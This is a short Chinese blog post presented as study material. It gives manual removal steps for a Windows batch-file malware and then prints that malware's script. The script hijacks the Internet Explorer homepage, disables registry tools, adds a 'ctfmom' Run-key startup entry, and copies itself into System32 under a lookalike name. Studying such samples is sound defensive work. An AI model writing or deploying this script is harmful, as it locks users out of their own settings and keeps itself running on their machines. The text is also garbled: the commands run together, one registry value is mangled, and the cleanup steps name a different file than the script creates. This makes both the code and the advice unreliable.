恶意代码实例一(学习)

恶意代码实例一(学习)

消除恶意程序删除文件C:\Windows\System32\rundll32.bat运行gpedit.msc组策略编辑器用户配置-->管理模板-->系统，将“阻止访问注册表工具”设为“已禁用”用户配置-->管理模板-->Windows组件-->Internet Explorer，将“禁止更改主页设置”设为“已禁用”编辑注册表，删除开机启动项“ctfmom”重新打开Internet Explorer浏览器，修复主页设置

@echo offreg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "/f /*reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /freg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /freg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ctfmom" /d "%windir%\System32\rund1132.bat" /fcopy %0 %windir%\System32\rund1132.bat

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。